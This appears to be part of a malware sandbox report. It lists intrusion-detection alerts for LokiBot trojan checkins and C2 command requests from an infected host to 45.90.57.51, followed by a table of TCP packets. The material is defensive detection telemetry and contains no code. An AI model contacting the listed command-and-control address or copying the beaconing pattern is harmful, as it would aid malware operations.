05/16/24-00:38:08.955748	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49752	80	192.168.2.5	45.90.57.51
05/16/24-00:38:25.211849	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49761	80	192.168.2.5	45.90.57.51
05/16/24-00:37:04.537805	TCP	2825766	ETPRO TROJAN LokiBot Checkin M2	49711	80	192.168.2.5	45.90.57.51
05/16/24-00:37:47.452852	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49740	80	192.168.2.5	45.90.57.51
05/16/24-00:38:34.303762	TCP	2025483	ET TROJAN LokiBot Fake 404 Response	80	49765	45.90.57.51	192.168.2.5
05/16/24-00:37:07.254938	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49712	80	192.168.2.5	45.90.57.51
05/16/24-00:36:56.970973	TCP	2025381	ET TROJAN LokiBot Checkin	49707	80	192.168.2.5	45.90.57.51
05/16/24-00:38:08.955748	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49752	80	192.168.2.5	45.90.57.51
05/16/24-00:37:41.744488	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49737	80	192.168.2.5	45.90.57.51
05/16/24-00:37:18.705946	TCP	2025381	ET TROJAN LokiBot Checkin	49726	80	192.168.2.5	45.90.57.51
05/16/24-00:38:38.095021	TCP	2025483	ET TROJAN LokiBot Fake 404 Response	80	49767	45.90.57.51	192.168.2.5
05/16/24-00:38:39.999092	TCP	2025483	ET TROJAN LokiBot Fake 404 Response	80	49768	45.90.57.51	192.168.2.5
05/16/24-00:38:43.272420	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49770	80	192.168.2.5	45.90.57.51
05/16/24-00:38:37.577907	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49767	80	192.168.2.5	45.90.57.51
05/16/24-00:38:43.272420	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49770	80	192.168.2.5	45.90.57.51
05/16/24-00:37:57.099162	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49746	80	192.168.2.5	45.90.57.51
05/16/24-00:38:03.239293	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49749	80	192.168.2.5	45.90.57.51
05/16/24-00:38:19.541569	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49758	80	192.168.2.5	45.90.57.51
05/16/24-00:38:41.388891	TCP	2025381	ET TROJAN LokiBot Checkin	49769	80	192.168.2.5	45.90.57.51
05/16/24-00:38:03.239293	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49749	80	192.168.2.5	45.90.57.51
05/16/24-00:38:52.000180	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49774	80	192.168.2.5	45.90.57.51
05/16/24-00:37:02.627302	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49710	80	192.168.2.5	45.90.57.51
05/16/24-00:38:10.859696	TCP	2825766	ETPRO TROJAN LokiBot Checkin M2	49753	80	192.168.2.5	45.90.57.51
05/16/24-00:37:16.803035	TCP	2025381	ET TROJAN LokiBot Checkin	49725	80	192.168.2.5	45.90.57.51
05/16/24-00:38:21.430034	TCP	2825766	ETPRO TROJAN LokiBot Checkin M2	49759	80	192.168.2.5	45.90.57.51
05/16/24-00:37:02.627302	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49710	80	192.168.2.5	45.90.57.51
05/16/24-00:38:39.485062	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49768	80	192.168.2.5	45.90.57.51
05/16/24-00:37:27.656502	TCP	2825766	ETPRO TROJAN LokiBot Checkin M2	49730	80	192.168.2.5	45.90.57.51
05/16/24-00:37:07.254938	TCP	2825766	ETPRO TROJAN LokiBot Checkin M2	49712	80	192.168.2.5	45.90.57.51
05/16/24-00:37:23.884685	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49728	80	192.168.2.5	45.90.57.51
05/16/24-00:38:47.045718	TCP	2025381	ET TROJAN LokiBot Checkin	49772	80	192.168.2.5	45.90.57.51
05/16/24-00:37:33.315004	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49733	80	192.168.2.5	45.90.57.51
05/16/24-00:38:15.699411	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49756	80	192.168.2.5	45.90.57.51
05/16/24-00:38:07.071740	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49751	80	192.168.2.5	45.90.57.51
05/16/24-00:37:33.315004	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49733	80	192.168.2.5	45.90.57.51
05/16/24-00:38:39.485062	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49768	80	192.168.2.5	45.90.57.51
05/16/24-00:36:55.076784	TCP	2025381	ET TROJAN LokiBot Checkin	49706	80	192.168.2.5	45.90.57.51
05/16/24-00:37:45.530428	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49739	80	192.168.2.5	45.90.57.51
05/16/24-00:37:20.628600	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49727	80	192.168.2.5	45.90.57.51
05/16/24-00:38:07.071740	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49751	80	192.168.2.5	45.90.57.51
05/16/24-00:37:45.530428	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49739	80	192.168.2.5	45.90.57.51
05/16/24-00:37:12.990169	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49723	80	192.168.2.5	45.90.57.51
05/16/24-00:37:41.744488	TCP	2825766	ETPRO TROJAN LokiBot Checkin M2	49737	80	192.168.2.5	45.90.57.51
05/16/24-00:37:42.248026	TCP	2025483	ET TROJAN LokiBot Fake 404 Response	80	49737	45.90.57.51	192.168.2.5
05/16/24-00:38:07.563893	TCP	2025483	ET TROJAN LokiBot Fake 404 Response	80	49751	45.90.57.51	192.168.2.5
05/16/24-00:38:50.619828	TCP	2025483	ET TROJAN LokiBot Fake 404 Response	80	49773	45.90.57.51	192.168.2.5
05/16/24-00:37:04.537805	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49711	80	192.168.2.5	45.90.57.51
05/16/24-00:37:23.884685	TCP	2825766	ETPRO TROJAN LokiBot Checkin M2	49728	80	192.168.2.5	45.90.57.51
05/16/24-00:37:47.452852	TCP	2825766	ETPRO TROJAN LokiBot Checkin M2	49740	80	192.168.2.5	45.90.57.51
05/16/24-00:37:51.232610	TCP	2825766	ETPRO TROJAN LokiBot Checkin M2	49743	80	192.168.2.5	45.90.57.51
05/16/24-00:37:35.199755	TCP	2825766	ETPRO TROJAN LokiBot Checkin M2	49734	80	192.168.2.5	45.90.57.51
05/16/24-00:36:54.264582	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49705	80	192.168.2.5	45.90.57.51
05/16/24-00:38:45.151548	TCP	2825766	ETPRO TROJAN LokiBot Checkin M2	49771	80	192.168.2.5	45.90.57.51
05/16/24-00:36:58.862053	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49708	80	192.168.2.5	45.90.57.51
05/16/24-00:37:00.746100	TCP	2825766	ETPRO TROJAN LokiBot Checkin M2	49709	80	192.168.2.5	45.90.57.51
05/16/24-00:38:21.924787	TCP	2025483	ET TROJAN LokiBot Fake 404 Response	80	49759	45.90.57.51	192.168.2.5
05/16/24-00:37:31.926842	TCP	2025483	ET TROJAN LokiBot Fake 404 Response	80	49732	45.90.57.51	192.168.2.5
05/16/24-00:37:12.990169	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49723	80	192.168.2.5	45.90.57.51
05/16/24-00:36:58.862053	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49708	80	192.168.2.5	45.90.57.51
05/16/24-00:38:45.151548	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49771	80	192.168.2.5	45.90.57.51
05/16/24-00:37:49.343817	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49742	80	192.168.2.5	45.90.57.51
05/16/24-00:38:15.699411	TCP	2825766	ETPRO TROJAN LokiBot Checkin M2	49756	80	192.168.2.5	45.90.57.51
05/16/24-00:38:17.603710	TCP	2025381	ET TROJAN LokiBot Checkin	49757	80	192.168.2.5	45.90.57.51
05/16/24-00:37:39.020338	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49736	80	192.168.2.5	45.90.57.51
05/16/24-00:37:49.343817	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49742	80	192.168.2.5	45.90.57.51
05/16/24-00:38:33.811515	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49765	80	192.168.2.5	45.90.57.51
05/16/24-00:38:27.085627	TCP	2825766	ETPRO TROJAN LokiBot Checkin M2	49762	80	192.168.2.5	45.90.57.51
05/16/24-00:37:27.656502	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49730	80	192.168.2.5	45.90.57.51
05/16/24-00:38:28.951650	TCP	2025381	ET TROJAN LokiBot Checkin	49763	80	192.168.2.5	45.90.57.51
05/16/24-00:37:03.138281	TCP	2025483	ET TROJAN LokiBot Fake 404 Response	80	49710	45.90.57.51	192.168.2.5
05/16/24-00:37:11.067189	TCP	2025381	ET TROJAN LokiBot Checkin	49722	80	192.168.2.5	45.90.57.51
05/16/24-00:38:21.430034	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49759	80	192.168.2.5	45.90.57.51
05/16/24-00:37:14.907253	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49724	80	192.168.2.5	45.90.57.51
05/16/24-00:37:39.020338	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49736	80	192.168.2.5	45.90.57.51

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
May 16, 2024 00:36:52.140711069 CEST	49704	80	192.168.2.5	45.90.57.51
May 16, 2024 00:36:52.376828909 CEST	80	49704	45.90.57.51	192.168.2.5
May 16, 2024 00:36:52.376983881 CEST	49704	80	192.168.2.5	45.90.57.51
May 16, 2024 00:36:52.383820057 CEST	49704	80	192.168.2.5	45.90.57.51
May 16, 2024 00:36:52.620134115 CEST	80	49704	45.90.57.51	192.168.2.5
May 16, 2024 00:36:52.620201111 CEST	49704	80	192.168.2.5	45.90.57.51
May 16, 2024 00:36:52.854576111 CEST	80	49704	45.90.57.51	192.168.2.5
May 16, 2024 00:36:52.880095959 CEST	80	49704	45.90.57.51	192.168.2.5
May 16, 2024 00:36:52.880112886 CEST	80	49704	45.90.57.51	192.168.2.5
May 16, 2024 00:36:52.880244970 CEST	49704	80	192.168.2.5	45.90.57.51
May 16, 2024 00:36:52.880395889 CEST	49704	80	192.168.2.5	45.90.57.51
May 16, 2024 00:36:53.115060091 CEST	80	49704	45.90.57.51	192.168.2.5
May 16, 2024 00:36:54.024975061 CEST	49705	80	192.168.2.5	45.90.57.51
May 16, 2024 00:36:54.262383938 CEST	80	49705	45.90.57.51	192.168.2.5
May 16, 2024 00:36:54.262470007 CEST	49705	80	192.168.2.5	45.90.57.51
May 16, 2024 00:36:54.264581919 CEST	49705	80	192.168.2.5	45.90.57.51
May 16, 2024 00:36:54.502063990 CEST	80	49705	45.90.57.51	192.168.2.5
May 16, 2024 00:36:54.502151012 CEST	49705	80	192.168.2.5	45.90.57.51
May 16, 2024 00:36:54.740143061 CEST	80	49705	45.90.57.51	192.168.2.5
May 16, 2024 00:36:54.765763998 CEST	80	49705	45.90.57.51	192.168.2.5
May 16, 2024 00:36:54.765805960 CEST	80	49705	45.90.57.51	192.168.2.5
May 16, 2024 00:36:54.765908003 CEST	49705	80	192.168.2.5	45.90.57.51
May 16, 2024 00:36:54.768630028 CEST	49705	80	192.168.2.5	45.90.57.51
May 16, 2024 00:36:54.829427958 CEST	49706	80	192.168.2.5	45.90.57.51
May 16, 2024 00:36:55.006936073 CEST	80	49705	45.90.57.51	192.168.2.5
May 16, 2024 00:36:55.074166059 CEST	80	49706	45.90.57.51	192.168.2.5
May 16, 2024 00:36:55.074250937 CEST	49706	80	192.168.2.5	45.90.57.51
May 16, 2024 00:36:55.076783895 CEST	49706	80	192.168.2.5	45.90.57.51
May 16, 2024 00:36:55.320790052 CEST	80	49706	45.90.57.51	192.168.2.5
May 16, 2024 00:36:55.320893049 CEST	49706	80	192.168.2.5	45.90.57.51
May 16, 2024 00:36:55.567595959 CEST	80	49706	45.90.57.51	192.168.2.5
May 16, 2024 00:36:55.590960979 CEST	80	49706	45.90.57.51	192.168.2.5
May 16, 2024 00:36:55.590975046 CEST	80	49706	45.90.57.51	192.168.2.5
May 16, 2024 00:36:55.591025114 CEST	49706	80	192.168.2.5	45.90.57.51
May 16, 2024 00:36:55.591105938 CEST	49706	80	192.168.2.5	45.90.57.51
May 16, 2024 00:36:55.834033966 CEST	80	49706	45.90.57.51	192.168.2.5
May 16, 2024 00:36:56.726418972 CEST	49707	80	192.168.2.5	45.90.57.51
May 16, 2024 00:36:56.968671083 CEST	80	49707	45.90.57.51	192.168.2.5
May 16, 2024 00:36:56.968795061 CEST	49707	80	192.168.2.5	45.90.57.51
May 16, 2024 00:36:56.970973015 CEST	49707	80	192.168.2.5	45.90.57.51
May 16, 2024 00:36:57.212793112 CEST	80	49707	45.90.57.51	192.168.2.5
May 16, 2024 00:36:57.212929964 CEST	49707	80	192.168.2.5	45.90.57.51
May 16, 2024 00:36:57.455156088 CEST	80	49707	45.90.57.51	192.168.2.5
May 16, 2024 00:36:57.478820086 CEST	80	49707	45.90.57.51	192.168.2.5
May 16, 2024 00:36:57.478837013 CEST	80	49707	45.90.57.51	192.168.2.5
May 16, 2024 00:36:57.478919983 CEST	49707	80	192.168.2.5	45.90.57.51
May 16, 2024 00:36:57.478981018 CEST	49707	80	192.168.2.5	45.90.57.51
May 16, 2024 00:36:57.722186089 CEST	80	49707	45.90.57.51	192.168.2.5
May 16, 2024 00:36:58.618002892 CEST	49708	80	192.168.2.5	45.90.57.51
May 16, 2024 00:36:58.859782934 CEST	80	49708	45.90.57.51	192.168.2.5
May 16, 2024 00:36:58.859914064 CEST	49708	80	192.168.2.5	45.90.57.51
May 16, 2024 00:36:58.862052917 CEST	49708	80	192.168.2.5	45.90.57.51
May 16, 2024 00:36:59.103797913 CEST	80	49708	45.90.57.51	192.168.2.5
May 16, 2024 00:36:59.103864908 CEST	49708	80	192.168.2.5	45.90.57.51
May 16, 2024 00:36:59.345592976 CEST	80	49708	45.90.57.51	192.168.2.5
May 16, 2024 00:36:59.369699001 CEST	80	49708	45.90.57.51	192.168.2.5
May 16, 2024 00:36:59.369712114 CEST	80	49708	45.90.57.51	192.168.2.5
May 16, 2024 00:36:59.369811058 CEST	49708	80	192.168.2.5	45.90.57.51
May 16, 2024 00:36:59.369868994 CEST	49708	80	192.168.2.5	45.90.57.51
May 16, 2024 00:36:59.612186909 CEST	80	49708	45.90.57.51	192.168.2.5
May 16, 2024 00:37:00.508028030 CEST	49709	80	192.168.2.5	45.90.57.51
May 16, 2024 00:37:00.743834972 CEST	80	49709	45.90.57.51	192.168.2.5
May 16, 2024 00:37:00.743952036 CEST	49709	80	192.168.2.5	45.90.57.51
May 16, 2024 00:37:00.746099949 CEST	49709	80	192.168.2.5	45.90.57.51
May 16, 2024 00:37:00.980556011 CEST	80	49709	45.90.57.51	192.168.2.5
May 16, 2024 00:37:00.980633020 CEST	49709	80	192.168.2.5	45.90.57.51
May 16, 2024 00:37:01.215014935 CEST	80	49709	45.90.57.51	192.168.2.5
May 16, 2024 00:37:01.238713026 CEST	80	49709	45.90.57.51	192.168.2.5
May 16, 2024 00:37:01.238724947 CEST	80	49709	45.90.57.51	192.168.2.5
May 16, 2024 00:37:01.238842010 CEST	49709	80	192.168.2.5	45.90.57.51
May 16, 2024 00:37:01.238903046 CEST	49709	80	192.168.2.5	45.90.57.51
May 16, 2024 00:37:01.476190090 CEST	80	49709	45.90.57.51	192.168.2.5
May 16, 2024 00:37:02.383997917 CEST	49710	80	192.168.2.5	45.90.57.51
May 16, 2024 00:37:02.624978065 CEST	80	49710	45.90.57.51	192.168.2.5
May 16, 2024 00:37:02.625116110 CEST	49710	80	192.168.2.5	45.90.57.51
May 16, 2024 00:37:02.627301931 CEST	49710	80	192.168.2.5	45.90.57.51
May 16, 2024 00:37:02.870266914 CEST	80	49710	45.90.57.51	192.168.2.5
May 16, 2024 00:37:02.870373011 CEST	49710	80	192.168.2.5	45.90.57.51
May 16, 2024 00:37:03.112654924 CEST	80	49710	45.90.57.51	192.168.2.5
May 16, 2024 00:37:03.138281107 CEST	80	49710	45.90.57.51	192.168.2.5
May 16, 2024 00:37:03.138294935 CEST	80	49710	45.90.57.51	192.168.2.5
May 16, 2024 00:37:03.138394117 CEST	49710	80	192.168.2.5	45.90.57.51
May 16, 2024 00:37:03.138434887 CEST	49710	80	192.168.2.5	45.90.57.51
May 16, 2024 00:37:03.381742001 CEST	80	49710	45.90.57.51	192.168.2.5
May 16, 2024 00:37:04.290246964 CEST	49711	80	192.168.2.5	45.90.57.51
May 16, 2024 00:37:04.535465002 CEST	80	49711	45.90.57.51	192.168.2.5
May 16, 2024 00:37:04.535563946 CEST	49711	80	192.168.2.5	45.90.57.51
May 16, 2024 00:37:04.537805080 CEST	49711	80	192.168.2.5	45.90.57.51
May 16, 2024 00:37:04.782433987 CEST	80	49711	45.90.57.51	192.168.2.5
May 16, 2024 00:37:04.782536983 CEST	49711	80	192.168.2.5	45.90.57.51
May 16, 2024 00:37:05.025089979 CEST	80	49711	45.90.57.51	192.168.2.5
May 16, 2024 00:37:05.048280001 CEST	80	49711	45.90.57.51	192.168.2.5
May 16, 2024 00:37:05.048291922 CEST	80	49711	45.90.57.51	192.168.2.5
May 16, 2024 00:37:05.048405886 CEST	49711	80	192.168.2.5	45.90.57.51
May 16, 2024 00:37:05.126118898 CEST	49711	80	192.168.2.5	45.90.57.51
May 16, 2024 00:37:05.368635893 CEST	80	49711	45.90.57.51	192.168.2.5
May 16, 2024 00:37:07.008030891 CEST	49712	80	192.168.2.5	45.90.57.51
May 16, 2024 00:37:07.252615929 CEST	80	49712	45.90.57.51	192.168.2.5
May 16, 2024 00:37:07.252775908 CEST	49712	80	192.168.2.5	45.90.57.51
May 16, 2024 00:37:07.254937887 CEST	49712	80	192.168.2.5	45.90.57.51
May 16, 2024 00:37:07.497678041 CEST	80	49712	45.90.57.51	192.168.2.5
May 16, 2024 00:37:07.497780085 CEST	49712	80	192.168.2.5	45.90.57.51
May 16, 2024 00:37:07.742532969 CEST	80	49712	45.90.57.51	192.168.2.5
May 16, 2024 00:37:07.768110037 CEST	80	49712	45.90.57.51	192.168.2.5
May 16, 2024 00:37:07.768121958 CEST	80	49712	45.90.57.51	192.168.2.5
May 16, 2024 00:37:07.768207073 CEST	49712	80	192.168.2.5	45.90.57.51
May 16, 2024 00:37:07.768295050 CEST	49712	80	192.168.2.5	45.90.57.51
May 16, 2024 00:37:08.013346910 CEST	80	49712	45.90.57.51	192.168.2.5
May 16, 2024 00:37:08.929712057 CEST	49713	80	192.168.2.5	45.90.57.51
May 16, 2024 00:37:09.167841911 CEST	80	49713	45.90.57.51	192.168.2.5
May 16, 2024 00:37:09.167980909 CEST	49713	80	192.168.2.5	45.90.57.51
May 16, 2024 00:37:09.170149088 CEST	49713	80	192.168.2.5	45.90.57.51
May 16, 2024 00:37:09.409989119 CEST	80	49713	45.90.57.51	192.168.2.5
May 16, 2024 00:37:09.410101891 CEST	49713	80	192.168.2.5	45.90.57.51
May 16, 2024 00:37:09.648677111 CEST	80	49713	45.90.57.51	192.168.2.5
May 16, 2024 00:37:09.676040888 CEST	80	49713	45.90.57.51	192.168.2.5
May 16, 2024 00:37:09.676055908 CEST	80	49713	45.90.57.51	192.168.2.5
May 16, 2024 00:37:09.676122904 CEST	49713	80	192.168.2.5	45.90.57.51
May 16, 2024 00:37:09.676172972 CEST	49713	80	192.168.2.5	45.90.57.51
May 16, 2024 00:37:09.914439917 CEST	80	49713	45.90.57.51	192.168.2.5
May 16, 2024 00:37:10.822846889 CEST	49722	80	192.168.2.5	45.90.57.51
May 16, 2024 00:37:11.064896107 CEST	80	49722	45.90.57.51	192.168.2.5
May 16, 2024 00:37:11.064975023 CEST	49722	80	192.168.2.5	45.90.57.51
May 16, 2024 00:37:11.067188978 CEST	49722	80	192.168.2.5	45.90.57.51
May 16, 2024 00:37:11.308636904 CEST	80	49722	45.90.57.51	192.168.2.5
May 16, 2024 00:37:11.308711052 CEST	49722	80	192.168.2.5	45.90.57.51
May 16, 2024 00:37:11.550667048 CEST	80	49722	45.90.57.51	192.168.2.5
May 16, 2024 00:37:11.574807882 CEST	80	49722	45.90.57.51	192.168.2.5
May 16, 2024 00:37:11.574822903 CEST	80	49722	45.90.57.51	192.168.2.5
May 16, 2024 00:37:11.574892044 CEST	49722	80	192.168.2.5	45.90.57.51
May 16, 2024 00:37:11.574930906 CEST	49722	80	192.168.2.5	45.90.57.51
May 16, 2024 00:37:11.820250034 CEST	80	49722	45.90.57.51	192.168.2.5
May 16, 2024 00:37:12.742119074 CEST	49723	80	192.168.2.5	45.90.57.51
May 16, 2024 00:37:12.988046885 CEST	80	49723	45.90.57.51	192.168.2.5
May 16, 2024 00:37:12.988162994 CEST	49723	80	192.168.2.5	45.90.57.51
May 16, 2024 00:37:12.990169048 CEST	49723	80	192.168.2.5	45.90.57.51
May 16, 2024 00:37:13.232760906 CEST	80	49723	45.90.57.51	192.168.2.5
May 16, 2024 00:37:13.233370066 CEST	49723	80	192.168.2.5	45.90.57.51
May 16, 2024 00:37:13.475780964 CEST	80	49723	45.90.57.51	192.168.2.5
May 16, 2024 00:37:13.504816055 CEST	80	49723	45.90.57.51	192.168.2.5
May 16, 2024 00:37:13.504827976 CEST	80	49723	45.90.57.51	192.168.2.5
May 16, 2024 00:37:13.504890919 CEST	49723	80	192.168.2.5	45.90.57.51
May 16, 2024 00:37:13.504937887 CEST	49723	80	192.168.2.5	45.90.57.51
May 16, 2024 00:37:13.747486115 CEST	80	49723	45.90.57.51	192.168.2.5
May 16, 2024 00:37:14.663906097 CEST	49724	80	192.168.2.5	45.90.57.51
May 16, 2024 00:37:14.905006886 CEST	80	49724	45.90.57.51	192.168.2.5
May 16, 2024 00:37:14.905132055 CEST	49724	80	192.168.2.5	45.90.57.51
May 16, 2024 00:37:14.907253027 CEST	49724	80	192.168.2.5	45.90.57.51
May 16, 2024 00:37:15.150156021 CEST	80	49724	45.90.57.51	192.168.2.5
May 16, 2024 00:37:15.150247097 CEST	49724	80	192.168.2.5	45.90.57.51
May 16, 2024 00:37:15.393204927 CEST	80	49724	45.90.57.51	192.168.2.5
May 16, 2024 00:37:15.418884993 CEST	80	49724	45.90.57.51	192.168.2.5
May 16, 2024 00:37:15.418898106 CEST	80	49724	45.90.57.51	192.168.2.5
May 16, 2024 00:37:15.418972969 CEST	49724	80	192.168.2.5	45.90.57.51
May 16, 2024 00:37:15.419019938 CEST	49724	80	192.168.2.5	45.90.57.51
May 16, 2024 00:37:15.663059950 CEST	80	49724	45.90.57.51	192.168.2.5
May 16, 2024 00:37:16.554980993 CEST	49725	80	192.168.2.5	45.90.57.51
May 16, 2024 00:37:16.797840118 CEST	80	49725	45.90.57.51	192.168.2.5
May 16, 2024 00:37:16.797920942 CEST	49725	80	192.168.2.5	45.90.57.51
May 16, 2024 00:37:16.803035021 CEST	49725	80	192.168.2.5	45.90.57.51
May 16, 2024 00:37:17.045747995 CEST	80	49725	45.90.57.51	192.168.2.5
May 16, 2024 00:37:17.045828104 CEST	49725	80	192.168.2.5	45.90.57.51
May 16, 2024 00:37:17.288973093 CEST	80	49725	45.90.57.51	192.168.2.5
May 16, 2024 00:37:17.315321922 CEST	80	49725	45.90.57.51	192.168.2.5
May 16, 2024 00:37:17.315335989 CEST	80	49725	45.90.57.51	192.168.2.5
May 16, 2024 00:37:17.315413952 CEST	49725	80	192.168.2.5	45.90.57.51
May 16, 2024 00:37:17.315450907 CEST	49725	80	192.168.2.5	45.90.57.51
May 16, 2024 00:37:17.558334112 CEST	80	49725	45.90.57.51	192.168.2.5
May 16, 2024 00:37:18.461124897 CEST	49726	80	192.168.2.5	45.90.57.51
May 16, 2024 00:37:18.703737020 CEST	80	49726	45.90.57.51	192.168.2.5
May 16, 2024 00:37:18.703927994 CEST	49726	80	192.168.2.5	45.90.57.51
May 16, 2024 00:37:18.705945969 CEST	49726	80	192.168.2.5	45.90.57.51
May 16, 2024 00:37:18.948687077 CEST	80	49726	45.90.57.51	192.168.2.5
May 16, 2024 00:37:18.948765039 CEST	49726	80	192.168.2.5	45.90.57.51
May 16, 2024 00:37:19.191472054 CEST	80	49726	45.90.57.51	192.168.2.5
May 16, 2024 00:37:19.223879099 CEST	80	49726	45.90.57.51	192.168.2.5
May 16, 2024 00:37:19.223893881 CEST	80	49726	45.90.57.51	192.168.2.5
May 16, 2024 00:37:19.224025965 CEST	49726	80	192.168.2.5	45.90.57.51
May 16, 2024 00:37:19.224095106 CEST	49726	80	192.168.2.5	45.90.57.51
May 16, 2024 00:37:19.467304945 CEST	80	49726	45.90.57.51	192.168.2.5
May 16, 2024 00:37:20.383080959 CEST	49727	80	192.168.2.5	45.90.57.51
May 16, 2024 00:37:20.626409054 CEST	80	49727	45.90.57.51	192.168.2.5
May 16, 2024 00:37:20.626499891 CEST	49727	80	192.168.2.5	45.90.57.51
May 16, 2024 00:37:20.628599882 CEST	49727	80	192.168.2.5	45.90.57.51
May 16, 2024 00:37:20.869940996 CEST	80	49727	45.90.57.51	192.168.2.5
May 16, 2024 00:37:20.870028019 CEST	49727	80	192.168.2.5	45.90.57.51
May 16, 2024 00:37:21.109606028 CEST	80	49727	45.90.57.51	192.168.2.5
May 16, 2024 00:37:21.133209944 CEST	80	49727	45.90.57.51	192.168.2.5
May 16, 2024 00:37:21.133223057 CEST	80	49727	45.90.57.51	192.168.2.5
May 16, 2024 00:37:21.133275986 CEST	49727	80	192.168.2.5	45.90.57.51
May 16, 2024 00:37:21.133327961 CEST	49727	80	192.168.2.5	45.90.57.51
May 16, 2024 00:37:21.372966051 CEST	80	49727	45.90.57.51	192.168.2.5
May 16, 2024 00:37:22.741508961 CEST	49728	80	192.168.2.5	45.90.57.51
May 16, 2024 00:37:22.975713968 CEST	80	49728	45.90.57.51	192.168.2.5
May 16, 2024 00:37:22.975805044 CEST	49728	80	192.168.2.5	45.90.57.51
May 16, 2024 00:37:23.884685040 CEST	49728	80	192.168.2.5	45.90.57.51
May 16, 2024 00:37:24.117063999 CEST	80	49728	45.90.57.51	192.168.2.5
May 16, 2024 00:37:24.117247105 CEST	49728	80	192.168.2.5	45.90.57.51
May 16, 2024 00:37:24.349479914 CEST	80	49728	45.90.57.51	192.168.2.5
May 16, 2024 00:37:24.372669935 CEST	80	49728	45.90.57.51	192.168.2.5
May 16, 2024 00:37:24.372689009 CEST	80	49728	45.90.57.51	192.168.2.5
May 16, 2024 00:37:24.372765064 CEST	49728	80	192.168.2.5	45.90.57.51
May 16, 2024 00:37:24.372818947 CEST	49728	80	192.168.2.5	45.90.57.51
May 16, 2024 00:37:24.604993105 CEST	80	49728	45.90.57.51	192.168.2.5
May 16, 2024 00:37:25.507488966 CEST	49729	80	192.168.2.5	45.90.57.51
May 16, 2024 00:37:25.748377085 CEST	80	49729	45.90.57.51	192.168.2.5
May 16, 2024 00:37:25.748451948 CEST	49729	80	192.168.2.5	45.90.57.51
May 16, 2024 00:37:25.750611067 CEST	49729	80	192.168.2.5	45.90.57.51
May 16, 2024 00:37:25.991482973 CEST	80	49729	45.90.57.51	192.168.2.5
May 16, 2024 00:37:25.991564989 CEST	49729	80	192.168.2.5	45.90.57.51
May 16, 2024 00:37:26.232480049 CEST	80	49729	45.90.57.51	192.168.2.5
May 16, 2024 00:37:26.257152081 CEST	80	49729	45.90.57.51	192.168.2.5
May 16, 2024 00:37:26.257173061 CEST	80	49729	45.90.57.51	192.168.2.5
May 16, 2024 00:37:26.257225990 CEST	49729	80	192.168.2.5	45.90.57.51
May 16, 2024 00:37:26.257258892 CEST	49729	80	192.168.2.5	45.90.57.51
May 16, 2024 00:37:26.498100996 CEST	80	49729	45.90.57.51	192.168.2.5
May 16, 2024 00:37:27.414952993 CEST	49730	80	192.168.2.5	45.90.57.51
May 16, 2024 00:37:27.654190063 CEST	80	49730	45.90.57.51	192.168.2.5
May 16, 2024 00:37:27.654309988 CEST	49730	80	192.168.2.5	45.90.57.51
May 16, 2024 00:37:27.656502008 CEST	49730	80	192.168.2.5	45.90.57.51
May 16, 2024 00:37:27.895632029 CEST	80	49730	45.90.57.51	192.168.2.5
May 16, 2024 00:37:27.895728111 CEST	49730	80	192.168.2.5	45.90.57.51
May 16, 2024 00:37:28.134994030 CEST	80	49730	45.90.57.51	192.168.2.5
May 16, 2024 00:37:28.165565014 CEST	80	49730	45.90.57.51	192.168.2.5
May 16, 2024 00:37:28.165579081 CEST	80	49730	45.90.57.51	192.168.2.5
May 16, 2024 00:37:28.165659904 CEST	49730	80	192.168.2.5	45.90.57.51
May 16, 2024 00:37:28.165729046 CEST	49730	80	192.168.2.5	45.90.57.51
May 16, 2024 00:37:28.405709982 CEST	80	49730	45.90.57.51	192.168.2.5
May 16, 2024 00:37:29.319896936 CEST	49731	80	192.168.2.5	45.90.57.51
May 16, 2024 00:37:29.553843021 CEST	80	49731	45.90.57.51	192.168.2.5
